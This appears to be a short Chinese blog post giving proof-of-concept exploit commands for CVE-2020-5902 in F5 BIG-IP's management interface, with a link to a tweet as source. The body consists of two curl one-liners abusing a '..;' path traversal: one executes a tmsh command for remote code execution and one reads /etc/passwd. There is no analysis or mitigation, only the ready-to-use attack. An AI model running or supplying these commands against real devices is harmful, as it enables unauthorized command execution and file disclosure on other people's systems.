cve-2020-5902 :

RCE:
curl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'

Read File:
curl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'

原文地址:
https://twitter.com/x4ce/status/1279790599793545216

最新文章

  1. ExtJs4常用配置方法备忘
  2. C语言中的变量
  3. ScalaTour-1.基础
  4. JS定位PDF页码。
  5. 安装ECMall后报PHP Strict Standards错误,请问如何解决
  6. noi 04:网线主管
  7. 【转】HLSL基础
  8. 安全超文本传输协议(HTTPS)详解
  9. 持续集成篇-- SonarQube代码质量管理平台的配置与使用
  10. Linux中dos2unix批量转换
  11. POJ 1087 A Plug for UNIX (网络流,最大流)
  12. element-ui笔记
  13. mybatis多参数传递(其中包括数组)
  14. [React]全自动数据表格组件——BodeGrid
  15. angular2的依赖注入
  16. 【Java】 归并排序的非递归实现
  17. Selenium (1) —— Selenium安装与测试(101 Tutorial)
  18. jmeter 线程组之间的参数传递(加密接口测试三)
  19. python写个御剑
  20. 团队项目之开题scrum meeting

热门文章

  1. TCP/IP三次握手协议
  2. Spring Boot 集成 Swagger 构建接口文档
  3. EasyARM-iMX257 linxu两年前的笔记
  4. wdcp如何添加反向代理功能
  5. 使用 Spark SQL 高效地读写 HBase
  6. 获取ul下面最后一个li或ul中有多少个li
  7. JavaSE之流程控制结构
  8. Linux上TCP的几个内核参数调优
  9. NodeJs通过HTTP模块发起GET|POST请求
  10. android studio 中jni底层日志的打印